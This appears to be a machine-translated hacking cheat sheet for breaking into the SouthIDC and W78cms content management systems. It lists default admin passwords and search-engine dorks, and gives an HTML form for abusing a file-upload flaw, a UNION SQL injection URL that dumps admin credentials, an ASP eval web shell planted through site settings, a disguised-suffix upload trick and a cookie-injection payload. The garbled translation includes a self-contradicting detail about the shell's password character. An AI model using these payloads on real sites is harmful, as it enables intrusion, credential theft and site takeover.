The southern data management system uses shell (a small summary)

Default Value:

Admin
Admin admin888
'Or' = 'or'
Default database databases/079lidc. MDB

Change style upload: http://www.yangtong.com/admin/southidceditor/admin_style.asp

Upload a package
 

 

Note

 

Http://www.xxx.cn/NewsType.asp? Smallclass = 'Union select 0, username + CHR (124) + password, from Admin Union select * from news where 1 = 2 and ''='

W78cms website management system
Keywords inurl: shopmore. asp? ID
Use the/admin/ewebeditor/admin default account password admin 198625

Keywords: inurl: alogin. asp
Trojan upload Suffix: asp;.asp.jpg
Admin/upload. asp? Fuptype = dB & fupname = Ach. asp;. ASP & frmname = Ach. asp

 

1. use the upfile_other.asp vulnerability file to directly obtain the shell
and open userreg. ASP is used to register a member and log on to the user. The Code is as follows:

<Meta content = "mshtml 6.00.2800.1400" name = generator> <Body leftmargin = 0 topmargin = 0>
<Form name = form1 action = "http://www.target.com/upfile_Other.asp"; method = post
Enctype = multipart/form-data> <input class = "tx1" type = file size = 30 name = FILENAME> <input class = "tx1" type = file size = 30 name = filename1> <input style = "border-right: RGB (88,88, 88) 1px double; border-top: RGB (88,88, 88) 1px double; font-weight: normal; font-size: 9pt; border-left: RGB (88,88, 88) 1px double; line-Height: normal; border-bottom: RGB (88,88, 88) 1px double; font-style: normal; font-variant: normal "type = submit value = upload name = submit>
<Input id = photourlid type = hidden value = 0 name = photourlid> </form> </body> Save the above Code as HTML format, replace the URL in the code, select the image file in the first box, and select. Cer Asa or ASP file for upload in the second box, followed by a space.

 

2. SQL Injection
Http://www.target.com/NewsType.asp? Smallclass = '% 20 Union % 20 select % 200, username % 2 BCHR (124) % 2 bpassword, 2, 3, 4, 5, 6, 7, 8, 9% 20 from % 20 admin % 20 Union % 20 select % 20 * % 20 from % 20 news % 20 where % 201 = 2% 20and % 20 ''='
The above Code directly exposes the Administrator account and password. The shell method is as follows:
Write in the copyright information of website configuration [http://www.target.com/admin/siteconfig.asp;
"%> <% Eval (Request (CHR (35) %> <%'
Shell written to http://www.target.com/inc/config.asp successfully
Here, the CHR (32) password is "#"

 

3. Cookie Injection
Clear the address bar, use the Union statement for injection, and submit:
Javascript: Alert (document. cookie = "id =" + escape ("1 and 1 = 2 Union select 1, username, password, 10 from admin "))
You can also use the cookie injection Conversion Tool of the eldest brother hedgehog.